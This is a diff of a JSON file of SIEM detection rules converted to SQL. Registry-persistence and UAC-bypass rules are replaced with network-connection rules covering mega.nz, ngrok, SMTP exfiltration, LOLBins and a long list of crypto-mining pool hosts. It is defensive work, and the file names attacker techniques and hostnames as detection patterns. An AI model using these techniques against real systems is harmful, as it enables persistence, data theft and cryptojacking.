"Lednyov Alexey, oscd.community, Sreeman", + "description": "Detects an executable accessing mega.co.nz, which could be a sign of forbidden file sharing use of data exfiltration by malicious actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1053.005" + "attack.exfiltration", + "attack.t1567.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of mega.nz uploaders and tools" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\TelemetryController\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Command' ESCAPE '\\' AND (NewValue LIKE '%.sh%' ESCAPE '\\' OR NewValue LIKE '%.exe%' ESCAPE '\\' OR NewValue LIKE '%.dll%' ESCAPE '\\' OR NewValue LIKE '%.bin%' ESCAPE '\\' OR NewValue LIKE '%.bat%' ESCAPE '\\' OR NewValue LIKE '%.cmd%' ESCAPE '\\' OR NewValue LIKE '%.js%' ESCAPE '\\' OR NewValue LIKE '%.ps%' ESCAPE '\\' OR NewValue LIKE '%.vb%' ESCAPE '\\' OR NewValue LIKE '%.jar%' ESCAPE '\\' OR NewValue LIKE '%.hta%' ESCAPE '\\' OR NewValue LIKE '%.msi%' ESCAPE '\\' OR NewValue LIKE '%.vbs%' ESCAPE '\\')) AND NOT ((NewValue LIKE '%\\\\system32\\\\CompatTelRunner.exe%' ESCAPE '\\' OR NewValue LIKE '%\\\\system32\\\\DeviceCensus.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Initiated = 'true' AND DestinationHostname LIKE '%api.mega.co.nz' ESCAPE '\\')" ], - "filename": "registry_set_telemetry_persistence.yml" + "filename": "net_connection_win_mega_nz.yml" }, { - "title": "Potential Persistence Via Scrobj.dll COM Hijacking", - "id": "fe20dda1-6f37-4379-bbe0-a98d400cae90", - "status": "experimental", - "description": "Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute", - "author": "frack113", + "title": "Regsvr32 Network Activity", + "id": "c7e91a02-d771-4a6d-a700-42587e0b1095", + "status": "test", + "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", + "author": "Dmitriy Lifanov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1546.015" + "attack.execution", + "attack.t1559.001", + "attack.defense_evasion", + "attack.t1218.010" ], "falsepositives": [ - "Legitimate use of the dll." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%InprocServer32\\\\(Default)' ESCAPE '\\' AND NewValue LIKE 'C:\\\\WINDOWS\\\\system32\\\\scrobj.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\'" ], - "filename": "registry_set_persistence_scrobj_dll.yml" + "filename": "net_connection_win_regsvr32_network_activity.yml" }, { - "title": "Registry Modification to Hidden File Extension", - "id": "5df86130-4e95-4a54-90f7-26541b40aec2", - "status": "test", - "description": "Hides the file extension through modification of the registry", - "author": "frack113", + "title": "Network Communication With Crypto Mining Pool", + "id": "fa5b1358-b040-4403-9868-15f7d9ab6329", + "status": "stable", + "description": "Detects initiated network connections to crypto mining pools", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1137" + "attack.impact", + "attack.t1496" ], "falsepositives": [ - "Administrative scripts" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\HideFileExt' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\Hidden' ESCAPE '\\' AND NewValue = 'DWORD (0x00000002)')))" + "SELECT * FROM logs WHERE DestinationHostname IN ('alimabi.cn', 'ap.luckpool.net', 'bcn.pool.minergate.com', 'bcn.vip.pool.minergate.com', 'bohemianpool.com', 'ca.minexmr.com', 'ca.monero.herominers.com', 'cbd.monerpool.org', 'cbdv2.monerpool.org', 'cryptmonero.com', 'crypto-pool.fr', 'crypto-pool.info', 'cryptonight-hub.miningpoolhub.com', 'd1pool.ddns.net', 'd5pool.us', 'daili01.monerpool.org', 'de.minexmr.com', 'dl.nbminer.com', 'donate.graef.in', 'donate.ssl.xmrig.com', 'donate.v2.xmrig.com', 'donate.xmrig.com', 'donate2.graef.in', 'drill.moneroworld.com', 'dwarfpool.com', 'emercoin.com', 'emercoin.net', 'emergate.net', 'ethereumpool.co', 'eu.luckpool.net', 'eu.minerpool.pw', 'fcn-xmr.pool.minergate.com', 'fee.xmrig.com', 'fr.minexmr.com', 'hellominer.com', 'herominers.com', 'huadong1-aeon.ppxxmr.com', 'iwanttoearn.money', 'jw-js1.ppxxmr.com', 'koto-pool.work', 'lhr.nbminer.com', 'lhr3.nbminer.com', 'linux.monerpool.org', 'lokiturtle.herominers.com', 'luckpool.net', 'masari.miner.rocks', 'mine.c3pool.com', 'mine.moneropool.com', 'mine.ppxxmr.com', 'mine.zpool.ca', 'mine1.ppxxmr.com', 'minemonero.gq', 'miner.ppxxmr.com', 'miner.rocks', 'minercircle.com', 'minergate.com', 'minerpool.pw', 'minerrocks.com', 'miners.pro', 'minerxmr.ru', 'minexmr.cn', 'minexmr.com', 'mining-help.ru', 'miningpoolhub.com', 'mixpools.org', 'moner.monerpool.org', 'moner1min.monerpool.org', 'monero-master.crypto-pool.fr', 'monero.crypto-pool.fr', 'monero.hashvault.pro', 'monero.herominers.com', 'monero.lindon-pool.win', 'monero.miners.pro', 'monero.riefly.id', 'monero.us.to', 'monerocean.stream', 'monerogb.com', 'monerohash.com', 'moneroocean.stream', 'moneropool.com', 'moneropool.nl', 'monerorx.com', 'monerpool.org', 'moriaxmr.com', 'mro.pool.minergate.com', 'multipool.us', 'myxmr.pw', 'na.luckpool.net', 'nanopool.org', 'nbminer.com', 'node3.luckpool.net', 'noobxmr.com', 'pangolinminer.comgandalph3000.com', 'pool.4i7i.com', 'pool.armornetwork.org', 'pool.cortins.tk', 'pool.gntl.co.uk', 'pool.hashvault.pro', 'pool.minergate.com', 'pool.minexmr.com', 'pool.monero.hashvault.pro', 'pool.ppxxmr.com', 'pool.somec.cc', 'pool.support', 'pool.supportxmr.com', 'pool.usa-138.com', 'pool.xmr.pt', 'pool.xmrfast.com', 'pool2.armornetwork.org', 'poolchange.ppxxmr.com', 'pooldd.com', 'poolmining.org', 'poolto.be', 'ppxvip1.ppxxmr.com', 'ppxxmr.com', 'prohash.net', 'r.twotouchauthentication.online', 'randomx.xmrig.com', 'ratchetmining.com', 'seed.emercoin.com', 'seed.emercoin.net', 'seed.emergate.net', 'seed1.joulecoin.org', 'seed2.joulecoin.org', 'seed3.joulecoin.org', 'seed4.joulecoin.org', 'seed5.joulecoin.org', 'seed6.joulecoin.org', 'seed7.joulecoin.org', 'seed8.joulecoin.org', 'sg.minexmr.com', 'sheepman.mine.bz', 'siamining.com', 'sumokoin.minerrocks.com', 'supportxmr.com', 'suprnova.cc', 'teracycle.net', 'trtl.cnpool.cc', 'trtl.pool.mine2gether.com', 'turtle.miner.rocks', 'us-west.minexmr.com', 'usxmrpool.com', 'viaxmr.com', 'webservicepag.webhop.net', 'xiazai.monerpool.org', 'xiazai1.monerpool.org', 'xmc.pool.minergate.com', 'xmo.pool.minergate.com', 'xmr-asia1.nanopool.org', 'xmr-au1.nanopool.org', 'xmr-eu1.nanopool.org', 'xmr-eu2.nanopool.org', 'xmr-jp1.nanopool.org', 'xmr-us-east1.nanopool.org', 'xmr-us-west1.nanopool.org', 'xmr-us.suprnova.cc', 'xmr-usa.dwarfpool.com', 'xmr.2miners.com', 'xmr.5b6b7b.ru', 'xmr.alimabi.cn', 'xmr.bohemianpool.com', 'xmr.crypto-pool.fr', 'xmr.crypto-pool.info', 'xmr.f2pool.com', 'xmr.hashcity.org', 'xmr.hex7e4.ru', 'xmr.ip28.net', 'xmr.monerpool.org', 'xmr.mypool.online', 'xmr.nanopool.org', 'xmr.pool.gntl.co.uk', 'xmr.pool.minergate.com', 'xmr.poolto.be', 'xmr.ppxxmr.com', 'xmr.prohash.net', 'xmr.simka.pw', 'xmr.somec.cc', 'xmr.suprnova.cc', 'xmr.usa-138.com', 'xmr.vip.pool.minergate.com', 'xmr1min.monerpool.org', 'xmrf.520fjh.org', 'xmrf.fjhan.club', 'xmrfast.com', 'xmrigcc.graef.in', 'xmrminer.cc', 'xmrpool.de', 'xmrpool.eu', 'xmrpool.me', 'xmrpool.net', 'xmrpool.xyz', 'xx11m.monerpool.org', 'xx11mv2.monerpool.org', 'xxx.hex7e4.ru', 'zarabotaibitok.ru', 'zer0day.ru')" ], - "filename": "registry_set_hidden_extention.yml" + "filename": "net_connection_win_crypto_mining_pools.yml" }, { - "title": "UAC Bypass via Sdclt", - "id": "5b872a46-3b90-45c1-8419-f675db8053aa", + "title": "Excel Network Connections", + "id": "75e33ce3-ae32-4dcc-9aa8-a2a3029d6f84", "status": "experimental", - "description": "Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)", - "author": "Omer Yampel, Christian Burkard (Nextron Systems)", + "description": "Detects an Excel process that opens suspicious network connections to non-private IP addresses, and attempts to cover CVE-2021-42292.\nYou will likely have to tune this rule for your organization, but it is certainly something you should look for and could have applications for malicious activity beyond CVE-2021-42292.\n", + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0\", Tim Shelton", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" + "attack.execution", + "attack.t1203" ], "falsepositives": [ - "Unknown" + "You may have to tune certain domains out that Excel may call out to, such as microsoft or other business use case domains.", + "Office documents commonly have templates that refer to external addresses, like sharepoint.ourcompany.com may have to be tuned.", + "It is highly recommended to baseline your activity and tune out common business use cases." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\exefile\\\\shell\\\\runas\\\\command\\\\isolatedCommand' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND NewValue REGEXP '-1[0-9]{3}\\\\Software\\\\Classes\\\\')))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationIsIpv6 = 'false') AND NOT ((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '127.0.0.1%' ESCAPE '\\')))" ], - "filename": "registry_set_uac_bypass_sdclt.yml" + "filename": "net_connection_win_excel_outbound_network_connection.yml" }, { - "title": "Lolbas OneDriveStandaloneUpdater.exe Proxy Download", - "id": "3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d", + "title": "Suspicious Network Connection to IP Lookup Service APIs", + "id": "edf3485d-dac4-4d50-90e4-b0e5813f7e60", "status": "experimental", - "description": "Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any\nanomalous executables with suspicious arguments. The downloaded file will be in C:\\Users\\redacted\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdaterreSignInSettingsConfig.json\n", - "author": "frack113", + "description": "Detects external IP address lookups by non-browser processes via services such as \"api.ipify.org\". This could be indicative of potential post compromise internet test activity.", + "author": "Janantha Marasinghe, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.discovery", + "attack.t1016" ], "falsepositives": [ - "Unknown" + "Legitimate use of the external websites for troubleshooting or network monitoring" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\OneDrive\\\\UpdateOfficeConfig\\\\UpdateRingSettingURLFromOC%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((DestinationHostname LIKE '%api.2ip.ua%' ESCAPE '\\' OR DestinationHostname LIKE '%api.ipify.org%' ESCAPE '\\' OR DestinationHostname LIKE '%bot.whatismyipaddress.com%' ESCAPE '\\' OR DestinationHostname LIKE '%canireachthe.net%' ESCAPE '\\' OR DestinationHostname LIKE '%checkip.amazonaws.com%' ESCAPE '\\' OR DestinationHostname LIKE '%checkip.dyndns.org%' ESCAPE '\\' OR DestinationHostname LIKE '%curlmyip.com%' ESCAPE '\\' OR DestinationHostname LIKE '%edns.ip-api.com%' ESCAPE '\\' OR DestinationHostname LIKE '%eth0.me%' ESCAPE '\\' OR DestinationHostname LIKE '%freegeoip.app%' ESCAPE '\\' OR DestinationHostname LIKE '%icanhazip.com%' ESCAPE '\\' OR DestinationHostname LIKE '%ident.me%' ESCAPE '\\' OR DestinationHostname LIKE '%ifconfig.io%' ESCAPE '\\' OR DestinationHostname LIKE '%ifconfig.me%' ESCAPE '\\' OR DestinationHostname LIKE '%ip-api.com%' ESCAPE '\\' OR DestinationHostname LIKE '%ip.anysrc.net%' ESCAPE '\\' OR DestinationHostname LIKE '%ip.tyk.nu%' ESCAPE '\\' OR DestinationHostname LIKE '%ipaddressworld.com%' ESCAPE '\\' OR DestinationHostname LIKE '%ipecho.net%' ESCAPE '\\' OR DestinationHostname LIKE '%ipinfo.io%' ESCAPE '\\' OR DestinationHostname LIKE '%ipof.in%' ESCAPE '\\' OR DestinationHostname LIKE '%ipv4.icanhazip.com%' ESCAPE '\\' OR DestinationHostname LIKE '%ipv4bot.whatismyipaddress.com%' ESCAPE '\\' OR DestinationHostname LIKE '%ipwho.is%' ESCAPE '\\' OR DestinationHostname LIKE '%l2.io%' ESCAPE '\\' OR DestinationHostname LIKE '%myexternalip.com%' ESCAPE '\\' OR DestinationHostname LIKE '%wgetip.com%' ESCAPE '\\' OR DestinationHostname LIKE '%whatismyip.akamai.com%' ESCAPE '\\' OR DestinationHostname LIKE '%wtfismyip.com%' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\maxthon.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\safari.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\seamonkey.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\whale.exe' ESCAPE '\\')))" ], - "filename": "registry_set_lolbin_onedrivestandaloneupdater.yml" + "filename": "net_connection_win_susp_external_ip_lookup.yml" }, { - "title": "Enabling COR Profiler Environment Variables", - "id": "ad89044a-8f49-4673-9a55-cbd88a1b374f", + "title": "Rundll32 Internet Connection", + "id": "cdc8da7d-c303-42f8-b08c-b4ab47230263", "status": "test", - "description": "This rule detects cor_enable_profiling and cor_profiler environment variables being set and configured.", - "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", + "description": "Detects a rundll32 that communicates with public IP addresses", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1574.012" + "attack.t1218.011", + "attack.execution" ], - "level": "high", + "falsepositives": [ + "Communication to other corporate systems that use IP addresses from public address spaces" + ], + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\COR\\_ENABLE\\_PROFILING' ESCAPE '\\' OR TargetObject LIKE '%\\\\COR\\_PROFILER' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND Initiated = 'true') AND NOT (((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp LIKE '20.%' ESCAPE '\\' OR DestinationIp LIKE '51.103.%' ESCAPE '\\' OR DestinationIp LIKE '51.104.%' ESCAPE '\\' OR DestinationIp LIKE '51.105.%' ESCAPE '\\') OR CommandLine LIKE '%PcaSvc.dll,PcaPatchSdbTask%' ESCAPE '\\' OR SourceHostname LIKE '%.internal.cloudapp.net' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND DestinationPort = '443')))" ], - "filename": "registry_set_enabling_cor_profiler_env_variables.yml" + "filename": "net_connection_win_rundll32_net_connections.yml" }, { - "title": "Potential Persistence Via App Paths Default Property", - "id": "707e097c-e20f-4f67-8807-1f72ff4500d6", + "title": "HH.EXE Network Connections", + "id": "468a8cea-2920-4909-a593-0cbe1d96674a", "status": "experimental", - "description": "Detects changes to the \"Default\" property for keys located in the \\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\ registry. Which might be used as a method of persistence\nThe entries found under App Paths are used primarily for the following purposes.\nFirst, to map an application's executable file name to that file's fully qualified path.\nSecond, to pre-pend information to the PATH environment variable on a per-application, per-process basis.\n", + "description": "Detects network connections made by the \"hh.exe\" process, which could indicate the execution/download of remotely hosted .chm files", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546.012" + "attack.defense_evasion", + "attack.t1218.001" ], "falsepositives": [ - "Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it)" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\App Paths%' ESCAPE '\\' AND (TargetObject LIKE '%(Default)' ESCAPE '\\' OR TargetObject LIKE '%Path' ESCAPE '\\') AND (NewValue LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%temp\\%%' ESCAPE '\\' OR NewValue LIKE '%\\%tmp\\%%' ESCAPE '\\' OR NewValue LIKE '%iex%' ESCAPE '\\' OR NewValue LIKE '%Invoke-%' ESCAPE '\\' OR NewValue LIKE '%rundll32%' ESCAPE '\\' OR NewValue LIKE '%regsvr32%' ESCAPE '\\' OR NewValue LIKE '%mshta%' ESCAPE '\\' OR NewValue LIKE '%cscript%' ESCAPE '\\' OR NewValue LIKE '%wscript%' ESCAPE '\\' OR NewValue LIKE '%.bat%' ESCAPE '\\' OR NewValue LIKE '%.hta%' ESCAPE '\\' OR NewValue LIKE '%.dll%' ESCAPE '\\' OR NewValue LIKE '%.ps1%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationPort IN ('80', '443', '135', '445'))" ], - "filename": "registry_set_persistence_app_paths.yml" + "filename": "net_connection_win_hh.yml" }, { - "title": "Blackbyte Ransomware Registry", - "id": "83314318-052a-4c90-a1ad-660ece38d276", - "status": "test", - "description": "BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption", - "author": "frack113", + "title": "Script Initiated Connection to Non-Local Network", + "id": "992a6cae-db6a-43c8-9cec-76d7195c96fc", + "status": "experimental", + "description": "Detects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads.", + "author": "frack113, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Legitimate scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LocalAccountTokenFilterPolicy' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLinkedConnections' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\FileSystem\\\\LongPathsEnabled' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE ((Initiated = 'true' AND (NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\')) AND NOT (((DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '172.%' ESCAPE '\\' OR DestinationIp LIKE '192.%' ESCAPE '\\' OR DestinationIp LIKE '169.254.%' ESCAPE '\\' OR DestinationIp LIKE '20.%' ESCAPE '\\')) OR ((DestinationIp LIKE '::1%' ESCAPE '\\' OR DestinationIp LIKE '0:0:0:0:0:0:0:1%' ESCAPE '\\' OR DestinationIp LIKE 'fe80:%' ESCAPE '\\' OR DestinationIp LIKE 'fc%' ESCAPE '\\' OR DestinationIp LIKE 'fd%' ESCAPE '\\'))))" ], - "filename": "registry_set_blackbyte_ransomware.yml" + "filename": "net_connection_win_script_wan.yml" }, { - "title": "Potential Persistence Via MyComputer Registry Keys", - "id": "8fbe98a8-8f9d-44f8-aa71-8c572e29ef06", + "title": "Suspicious Outbound SMTP Connections", + "id": "9976fa64-2804-423c-8a5b-646ade840773", "status": "experimental", - "description": "Detects modification to the \"Default\" value of the \"MyComputer\" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nThe data may also be sent to an alternate network location from the main command and control server.\n", + "author": "frack113", "tags": [ - "attack.persistence" + "attack.exfiltration", + "attack.t1048.003" ], "falsepositives": [ - "Unlikely but if you experience FPs add specific processes and locations you would like to monitor for" + "Other SMTP tools" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\MyComputer%' ESCAPE '\\' AND TargetObject LIKE '%(Default)' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((DestinationPort IN ('25', '587', '465', '2525') AND Initiated = 'true') AND NOT (((NewProcessName LIKE '%\\\\thunderbird.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\microsoft.windowscommunicationsapps\\_%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\HxTsr.exe' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_mycomputer.yml" + "filename": "net_connection_win_susp_outbound_smtp_connections.yml" }, { - "title": "Service Binary in Suspicious Folder", - "id": "a07f0359-4c90-4dc4-a681-8ffea40b4f47", + "title": "Communication To Ngrok Tunneling Service", + "id": "1d08ac94-400d-4469-a82f-daee9a908849", "status": "experimental", - "description": "Detect the creation of a service with a service binary located in a suspicious directory", - "author": "Florian Roth (Nextron Systems), frack113", + "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.exfiltration", + "attack.command_and_control", + "attack.t1567", + "attack.t1568.002", + "attack.t1572", + "attack.t1090", + "attack.t1102", + "attack.s0508" ], "falsepositives": [ - "Unknown" + "Legitimate use of ngrok" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Start' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\') AND NewValue IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND 